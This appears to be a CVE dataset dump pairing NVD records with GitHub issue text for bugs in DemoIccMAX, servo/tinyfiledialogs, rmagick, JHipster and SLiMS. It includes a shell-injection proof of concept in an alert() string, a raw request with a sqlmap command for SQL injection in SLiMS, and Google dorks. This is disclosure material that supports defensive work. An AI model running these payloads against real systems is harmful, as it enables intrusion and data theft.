fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x000100403600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x000100403680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==79070==ABORTING ``` ## Clang Static Analyzer Report #### Logic error Assigned value is garbage or undefined 2 Called C++ object pointer is null 3 Dereference of null pointer 13 Garbage return value 1 Result of operation is garbage or undefined 4 Uninitialized argument value 6 Unix API 4 #### Memory error Bad deallocator 7 Double free 2 Memory leak 10 Use-after-free 8 #### Unix API Allocator sizeof operand mismatch 1 #### Unused code Dead assignment 28 Dead increment 3 Dead initialization 20 Dead nested assignment 1 ## Knowledgebase https://bugs.chromium.org/p/project-zero/issues/detail?id=2225 https://bugs.chromium.org/p/project-zero/issues/detail?id=2226 https://srd.cx/cve-2022-26730/ https://srd.cx/cve-2023-32443/ Clang Static Analyzer Report [https://xss.cx/2023/10/29/src/demomax-clang-static-analysis/](https://xss.cx/2023/10/29/src/demomax-clang-static-analysis/) Pull Request https://github.com/InternationalColorConsortium/DemoIccMAX/pull/53 icFixXml function [CVE-2023-46602] CIccPRMG::GetChroma function [CVE-2023-46603] ## Debugging Aids #### Build ``` cmake -DCMAKE_INSTALL_PREFIX=$HOME/.local \ -DCMAKE_BUILD_TYPE=Debug \ -DCMAKE_CXX_FLAGS="-g -fsanitize=address -fno-omit-frame-pointer -Wall -std=c++17 -fprofile-instr-generate -fcoverage-mapping" \ ../Build/Cmake make ``` #### Other Overflow Examples ``` DemoIccMAX-master/Build/Tools/IccFromXml/iccFromXml DemoIccMAX-master/Testing/CMYK-3DLUTs/CMYK-3DLUTs2.xml DemoIccMAX-master/Testing/CMYK-3DLUTs/CMYK-3DLUTs2.icc DemoIccMAX-master/Build/Tools/IccFromXml/iccFromXml DemoIccMAX-master/Testing/ICS/Rec2100HlgFull-Part1.xml DemoIccMAX-master/Testing/ICS/Rec2100HlgFull-Part1.icc DemoIccMAX-master/Build/Tools/IccFromXml/iccFromXml DemoIccMAX-master/Testing/ICS/Rec2100HlgFull-Part2.xml DemoIccMAX-master/Testing/ICS/Rec2100HlgFull-Part2.icc DemoIccMAX-master/Build/Tools/IccFromXml/iccFromXml DemoIccMAX-master/Testing/Overprint/17ChanPart1.xml DemoIccMAX-master/Testing/Overprint/17ChanPart1.icc ``` ### IccEval.cpp at Line 139 - 172 ``` // * Modified by @h02332 | David Hoyt // determine granularity if (!nGran) { CIccTag* tag = pProfile->FindTag(icSigAToB0Tag + (nIntent == icAbsoluteColorimetric ? icRelativeColorimetric : nIntent)); if (!tag) { std::cerr << "Tag is nullptr!" << std::endl; return icCmmStatColorNotFound; } try { if (dynamic_cast<CIccTagLut16*>(tag) != nullptr) { std::cerr << "Unexpected object type detected!" << std::endl; // If there's a method to get more details about the tag, use it. If not, skip this line. // std::cerr << "Tag details: " << tag->GetDetails() << std::endl; std::cerr << "Actual object type: " << typeid(*tag).name() << std::endl; } else { std::cerr << "Tag is not of expected type!" << std::endl; std::cerr << "Actual object type: " << typeid(*tag).name() << std::endl; } } catch (const std::bad_typeid& e) { std::cerr << "Caught bad_typeid exception: " << e.what() << std::endl; return icCmmStatBadLutType; } CIccTagLutAtoB* pTag = dynamic_cast<CIccTagLutAtoB*>(tag); // Check if pTag is valid. If it's not, we set nGran to default value and skip further checks. if (!pTag || ndim == 3) { nGran = 33; } else { CIccCLUT* pClut = pTag->GetCLUT(); nGran = pClut ? (pClut->GridPoints() + 2) : 33; } } ``` ### IccTagLut.cpp at Line 2523 - 2666 ``` /** ****************************************************************************** * Name: CIccCLUT::Interp3d * * Purpose: Three dimensional interpolation function * * Args: * Pixel = Pixel value to be found in the CLUT. Also used to store the result. * Modified by @h02332 | David Hoyt ******************************************************************************* */ void CIccCLUT::Interp3d(icFloatNumber *destPixel, const icFloatNumber *srcPixel) const { icUInt8Number mx = m_MaxGridPoint[0]; icUInt8Number my = m_MaxGridPoint[1]; icUInt8Number mz = m_MaxGridPoint[2]; icFloatNumber x = UnitClip(srcPixel[0]) * mx; icFloatNumber y = UnitClip(srcPixel[1]) * my; icFloatNumber z = UnitClip(srcPixel[2]) * mz; icUInt32Number ix = (icUInt32Number)x; icUInt32Number iy = (icUInt32Number)y; icUInt32Number iz = (icUInt32Number)z; icFloatNumber u = x - ix; icFloatNumber t = y - iy; icFloatNumber s = z - iz; if (ix == mx) { ix--; u = 1.0; } if (iy == my) { iy--; t = 1.0; } if (iz == mz) { iz--; s = 1.0; } icFloatNumber ns = (icFloatNumber)(1.0 - s); icFloatNumber nt = (icFloatNumber)(1.0 - t); icFloatNumber nu = (icFloatNumber)(1.0 - u); icUInt32Number maxIndex = (mx + 1) * (my + 1) * (mz + 1) * m_nOutput - 1; icFloatNumber dF0 = ns * nt * nu; icFloatNumber dF1 = ns * nt * u; icFloatNumber dF2 = ns * t * nu; icFloatNumber dF3 = ns * t * u; icFloatNumber dF4 = s * nt * nu; icFloatNumber dF5 = s * nt * u; icFloatNumber dF6 = s * t * nu; icFloatNumber dF7 = s * t * u; icFloatNumber *pStart = &m_pData[ix * n001 + iy * n010 + iz * n100]; for (int i = 0; i < m_nOutput; i++) { icFloatNumber *p = pStart + i; // Logging statements before the problematic line: std::cout << "Pointer p: " << p << std::endl; std::cout << "n000: " << n000 << ", Value: " << p[n000] << std::endl; std::cout << "n001: " << n001 << ", Value: " << p[n001] << std::endl; std::cout << "n010: " << n010 << ", Value: " << p[n010] << std::endl; std::cout << "n011: " << n011 << ", Value: " << p[n011] << std::endl; std::cout << "n100: " << n100 << ", Value: " << p[n100] << std::endl; std::cout << "n101: " << n101 << ", Value: " << p[n101] << std::endl; std::cout << "n110: " << n110 << ", Value: " << p[n110] << std::endl; std::cout << "n111: " << n111 << ", Value: " << p[n111] << std::endl; // ... Similarly for other indices ... // Log the maximum possible index and the current index std::cout << "Max Index: " << maxIndex << ", Current Index: " << (p + n111 - m_pData) << std::endl; if (p + n111 > m_pData + maxIndex) { std::cerr << "Potential overflow detected. Aborting." << std::endl; return; } // Try to safely access the value at p[n000] if (p + n000 > m_pData + maxIndex) { std::cerr << "Potential overflow detected. Aborting." << std::endl; return; } else { std::cout << "Value at (p + n000): " << p[n000] << std::endl; } if ((p + n001) >= (m_pData + maxIndex)) { std::cerr << "Out-of-bounds access detected for n001." << std::endl; } if ((p + n010) >= (m_pData + maxIndex)) { std::cerr << "Out-of-bounds access detected for n010." << std::endl; } if ((p + n011) >= (m_pData + maxIndex)) { std::cerr << "Out-of-bounds access detected for n011." << std::endl; } if ((p + n100) >= (m_pData + maxIndex)) { std::cerr << "Out-of-bounds access detected for n100." << std::endl; } if ((p + n101) >= (m_pData + maxIndex)) { std::cerr << "Out-of-bounds access detected for n101." << std::endl; } if ((p + n110) >= (m_pData + maxIndex)) { std::cerr << "Out-of-bounds access detected for n110." << std::endl; } if ((p + n111) >= (m_pData + maxIndex)) { std::cerr << "Out-of-bounds access detected for n111." << std::endl; } // Add logging statements before the problematic line: std::cout << "n000: " << n000 << std::endl; std::cout << "n001: " << n001 << std::endl; std::cout << "n010: " << n010 << std::endl; std::cout << "n011: " << n011 << std::endl; std::cout << "n100: " << n100 << std::endl; std::cout << "n101: " << n101 << std::endl; std::cout << "n110: " << n110 << std::endl; std::cout << "n111: " << n111 << std::endl; std::cout << "ix: " << ix << std::endl; std::cout << "iy: " << iy << std::endl; std::cout << "iz: " << iz << std::endl; std::cout << "n001: " << n001 << std::endl; std::cout << "n010: " << n010 << std::endl; std::cout << "n100: " << n100 << std::endl; std::cout << "pStart address: " << pStart << std::endl; // Before the problematic line std::cout << "Pointer p: " << p << std::endl; std::cout << "n000: " << n000 << std::endl; std::cout << "Address (p + n000): " << p + n000 << std::endl; destPixel[i] = p[n000] * dF0 + p[n001] * dF1 + p[n010] * dF2 + p[n011] * dF3 + p[n100] * dF4 + p[n101] * dF5 + p[n110] * dF6 + p[n111] * dF7; } } ``` ## IccUtilXml.cpp at Line 421 - 491 ``` // * Modified by @h02332 | David Hoyt class CIccDumpXmlCLUT : public IIccCLUTExec { public: CIccDumpXmlCLUT(std::string *xml, icConvertType nType, std::string blanks, icUInt16Number nSamples, icUInt8Number nPixelsPerRow) { m_xml = xml; m_nType = nType; m_blanks = blanks; m_nSamples = nSamples; m_nPixelsPerRow = nPixelsPerRow; m_nCurPixel = 0; } virtual void PixelOp(icFloatNumber* pGridAdr, icFloatNumber* pData) { if (!pData) { std::cerr << "Error: pData is nullptr." << std::endl; return; // Early return if pData is null } int i; char buf[128]; if (!(m_nCurPixel % m_nPixelsPerRow)) *m_xml += m_blanks; switch(m_nType) { case icConvert8Bit: for (i=0; i<m_nSamples; i++) { if (&pData[i] == nullptr) { // Check if accessing pData[i] is valid std::cerr << "Error: pData[i] is out of bounds." << std::endl; return; } sprintf(buf, " %3d", (icUInt8Number)(pData[i]*255.0 + 0.5)); *m_xml += buf; } break; case icConvert16Bit: for (i=0; i<m_nSamples; i++) { sprintf(buf, " %5d", (icUInt16Number)(pData[i]*65535.0 + 0.5)); *m_xml += buf; } break; case icConvertFloat: default: for (i=0; i<m_nSamples; i++) { sprintf(buf, " %13.8f", pData[i]); *m_xml += buf; } break; } m_nCurPixel++; if (!(m_nCurPixel % m_nPixelsPerRow)) { *m_xml += "\n"; } } void Finish() { if (m_nCurPixel % m_nPixelsPerRow) { *m_xml += "\n"; } } std::string *m_xml; icConvertType m_nType; std::string m_blanks; icUInt16Number m_nSamples; icUInt8Number m_nPixelsPerRow; icUInt32Number m_nCurPixel; }; ``` ## DORKs for IccXmlLib or IccProfLib ``` intext:"libiccxml" OR intext:"iccproflib" "International Color Consortium" filetype:pdf OR filetype:txt OR filetype:md OR filetype:xml OR filetype:txt OR filetype:cpp "Libiccxml" OR "iccproflib" "iccxmllib" OR "iccproflib" ```
Bugs from Fuzzing
https://api.github.com/repos/InternationalColorConsortium/DemoIccMAX/issues/54/comments
0
2023-10-26T18:51:51Z
2024-05-09T02:28:54Z
https://github.com/InternationalColorConsortium/DemoIccMAX/issues/54
1,964,174,295
54
5,709
CVE-2020-36767
2023-10-30T19:15:07.767
tinyfiledialogs (aka tiny file dialogs) before 3.8.0 allows shell metacharacters in titles, messages, and other input data.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/servo/servo/issues/25498#issuecomment-703527082" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/servo/servo/issues/25498#issuecomment-703527082" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vareille:tinyfiledialogs:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EB85E3F-EB36-4152-9949-76F2A9FA6384", "versionEndExcluding": "3.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "94" ]
94
https://github.com/servo/servo/issues/25498#issuecomment-703527082
[ "Exploit", "Issue Tracking" ]
github.com
[ "servo", "servo" ]
I took a quick look at the issues, but I didn't find a similar one. Also, I hope that this is the right repository to report this. Opening this HTML file executes code on the client: ```html <html> <script> alert("Hey, `id`!"); </script> </html> ``` In the console this produces the following output which is fine: ``` ALERT: Hey, `id`! ``` But the popup shows that `id` is indeed being run: ![grafik](https://user-images.githubusercontent.com/5578100/72219536-6b74fa80-3547-11ea-97e7-d644ac24f361.png) I reported this issue over at https://github.com/jdm/tinyfiledialogs-rs/issues/19 half a year ago but I'm not sure it is going to be fixed there. I downloaded the nightly build from servo.org today and ran it under Ubuntu 18.04 amd64.
alert leads to code execution on Linux
https://api.github.com/repos/servo/servo/issues/25498/comments
7
2020-01-12T13:28:18Z
2025-04-24T22:44:48Z
https://github.com/servo/servo/issues/25498
548,570,631
25,498
5,710
CVE-2023-5349
2023-10-30T21:15:07.643
A memory leak flaw was found in ruby-magick, an interface between Ruby and ImageMagick. This issue can lead to a denial of service (DOS) by memory exhaustion.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-5349" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2247064" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rmagick/rmagick/issues/1401" }, { "source": "secalert@redhat.com", "tags": [ "Patch" ], "url": "https://github.com/rmagick/rmagick/pull/1406" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S3XMQ2KWPYGT447EKPENGXXHKAQ5NUWF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-5349" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2247064" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rmagick/rmagick/issues/1401" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/rmagick/rmagick/pull/1406" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S3XMQ2KWPYGT447EKPENGXXHKAQ5NUWF/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rmagick:rmagick:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "B9093FAF-BBDD-4BAD-9274-6896A5F0BF47", "versionEndExcluding": "5.3.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/rmagick/rmagick/issues/1401
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rmagick", "rmagick" ]
### Description Long running ruby process creating images with rmagick consumes massive amounts of memory since most recent ImageMagick-6.9.12-90.tar.gz release. ### Steps to Reproduce Install latest imagemagick@6 (https://formulae.brew.sh/api/formula/imagemagick@6.json) and install rmagick 5.2.0. Long running ruby process to create thousands of graph images. Process consumes way more memory that cripples host machine. I'm suggesting this memory issue is a result of the latest security updates to ImageMagick 6. I understand this might not be the right place for this issue but I figured I'd start here first. /usr/local/Cellar/imagemagick@6/6.9.12-67 => 248mbs of memory that plateaus out. /usr/local/Cellar/imagemagick@6/6.9.12-90 => 7Gigs of memory that keeps accruing exponentially This issue has come up since the latest ImageMagick release (ImageMagick-6.9.12-90.tar.gz) which came out June 25th 2023 and subsequent Ubuntu packages (imagemagickwand-dev [8:6.9.10.23+dfsg-2.1ubuntu11.9]) and MacOS (imagemagick@6 /usr/local/Cellar/imagemagick@6/6.9.12-90). ### System Configuration Ubuntu 20 LTS (8:6.9.10.23+dfsg-2.1ubuntu11.9 [security]: amd64 i386) MacOS 12.6.7 (https://formulae.brew.sh/api/formula/imagemagick@6.json) - ImageMagick version: ImageMagick-6.9.12-90 - RMagick version: 5.2.0 - Ruby version: 3.1.2 - Environment (Operating system, version and so on): MacOS 12.6.7, Ubuntu 20 LTS - Additional information: In both MacOS and Ubuntu 20 LTS with the same code ruby app memory consumption increases exponentially until, in the case of Ubuntu 20 LTS, the process is killed. https://www.ubuntuupdates.org/package/core/focal/universe/updates/imagemagick imagemagickwand-dev [8:6.9.10.23+dfsg-2.1ubuntu11.7] works great! imagemagickwand-dev [8:6.9.10.23+dfsg-2.1ubuntu11.9] memory hog, kills process https://github.com/Homebrew/homebrew-core/blob/master/Formula/imagemagick@6.rb [imagemagick@6: update 6.9.12-67 bottle.]https://github.com/Homebrew/homebrew-core/blob/b8ea6da2121433feb4fb67a47b2600c9e54e7402/Formula/imagemagick%406.rb works great! [imagemagick@6: update 6.9.12-90 bottle.](https://github.com/Homebrew/homebrew-core/commit/8538e43f6e405627220197e571d5aff81c05e7af) memory hog, kills process ### Steps I've tried to free up memory Tried to use #destroy! ``` image = Magick::Image.read(file) image.format = "PNG" image.write("/home/png/#{File.basename(file, '.*')}.png") image.destroy! ``` Tried to nil out image object ``` image = Magick::Image.read(file) image.format = "PNG" image.write("/home/png/#{File.basename(file, '.*')}.png") image = nil ``` and even GC.start ``` image = Magick::Image.read(file) image.format = "PNG" image.write("/home/png/#{File.basename(file, '.*')}.png") GC.start ``` Memory consumption increases exponentially with newest imagemagick security release.
Huge memory consumption with latest imagemagick@6 update
https://api.github.com/repos/rmagick/rmagick/issues/1401/comments
29
2023-07-07T13:47:42Z
2025-03-28T16:58:00Z
https://github.com/rmagick/rmagick/issues/1401
1,793,583,138
1,401
5,711
CVE-2015-20110
2023-10-31T03:15:07.613
JHipster generator-jhipster before 2.23.0 allows a timing attack against validateToken due to a string comparison that stops at the first character that is different. Attackers can guess tokens by brute forcing one character at a time and observing the timing. This of course drastically reduces the search space to a linear amount of guesses based on the token length times the possible characters.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/jhipster/generator-jhipster/commit/79fe5626cb1bb80f9ac86cf46980748e65d2bdbc" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/jhipster/generator-jhipster/commit/7c49ab3d45dc4921b831a2ca55fb1e2a2db1ee25" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Release Notes" ], "url": "https://github.com/jhipster/generator-jhipster/compare/v2.22.0...v2.23.0" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jhipster/generator-jhipster/issues/2095" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/jhipster/generator-jhipster/commit/79fe5626cb1bb80f9ac86cf46980748e65d2bdbc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/jhipster/generator-jhipster/commit/7c49ab3d45dc4921b831a2ca55fb1e2a2db1ee25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes" ], "url": "https://github.com/jhipster/generator-jhipster/compare/v2.22.0...v2.23.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jhipster/generator-jhipster/issues/2095" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jhipster:jhipster:*:*:*:*:*:*:*:*", "matchCriteriaId": "975D9B1E-D46A-4E51-9190-4A5C1F050EB6", "versionEndExcluding": "2.23.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "307" ]
307
https://github.com/jhipster/generator-jhipster/issues/2095
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jhipster", "generator-jhipster" ]
The TokenProvider uses `String.equals(str)` to compare the given token-signature with a calculated one. This method uses a break-on-inequality algorithm. This makes the TokenProvider vulnerable to timing attacks, where an attacker can forge a token with any username more easily than using brute force. [Coda Hale did a nice blog post on this topic](http://codahale.com/a-lesson-in-timing-attacks/)
Security: TokenProvider vulnerable to timing attacks
https://api.github.com/repos/jhipster/generator-jhipster/issues/2095/comments
6
2015-10-06T16:05:56Z
2016-08-12T02:42:34Z
https://github.com/jhipster/generator-jhipster/issues/2095
110,043,433
2,095
5,712
CVE-2023-45996
2023-10-31T06:15:07.883
SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Vuln0wned/slims_owned/blob/main/slims/slims9-bulian-9.6.1-SQLI-member_type.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/216" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Vuln0wned/slims_owned/blob/main/slims/slims9-bulian-9.6.1-SQLI-member_type.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/216" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "BA26D88B-C9C8-4F63-9953-F4F2520AD952", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:slims:senayan_library_management_system_bulian:9.6.1:*:*:*:*:*:*:*", "matchCriteriaId": "0439647C-9560-44A0-B186-BFDF828ECD17", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/216
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
# The Bug A SQL Injection has found in `admin/modules/membership/member_type.php` at the code below ``` $data['member_type_name'] = $dbs->escape_string($memberTypeName); $data['loan_limit'] = trim($_POST['loanLimit']); $data['loan_periode'] = trim($_POST['loanPeriode']); $data['enable_reserve'] = $_POST['enableReserve']; $data['reserve_limit'] = $_POST['reserveLimit']; $data['member_periode'] = $_POST['memberPeriode']; $data['reborrow_limit'] = $_POST['reborrowLimit']; $data['fine_each_day'] = $_POST['fineEachDay']; $data['grace_periode'] = $_POST['gracePeriode']; $data['input_date'] = date('Y-m-d'); $data['last_update'] = date('Y-m-d'); ``` ### To Reproduce Steps to reproduce the behavior: 1. Login as admin or user that has access membership type 2. Make sure the burp application is turned on to capture the request as screenshot below ![image](https://github.com/slims/slims9_bulian/assets/143168734/32ee28bb-2025-4c67-82a5-1b393a70b411) 3. Save the request in a separate file (sample.reg) sample.reg example ``` POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1 Host: localhost Content-Length: 1420 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn Connection: close ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="csrf_token" 29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="form_name" mainForm ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="memberTypeName" abcdef ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="loanLimit" 0 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="loanPeriode" 0 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="enableReserve" 1 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="reserveLimit" 0 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="memberPeriode" 1 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="reborrowLimit" 4423 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="fineEachDay" 1 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="gracePeriode" 0 ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="saveData" Update ------WebKitFormBoundaryQUBKpazqdLdsHspa Content-Disposition: form-data; name="updateRecordID" 2 ------WebKitFormBoundaryQUBKpazqdLdsHspa-- ``` run the test with the following command: ``` sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user ``` 5. You've entered into the system ![image](https://github.com/slims/slims9_bulian/assets/143168734/5c1ea4c0-317e-45b3-a4c9-20bb97887a28) ## Screenshots ![image3](https://github.com/slims/slims9_bulian/assets/143168734/b213afde-559c-4a8a-9877-57190e4796e1) 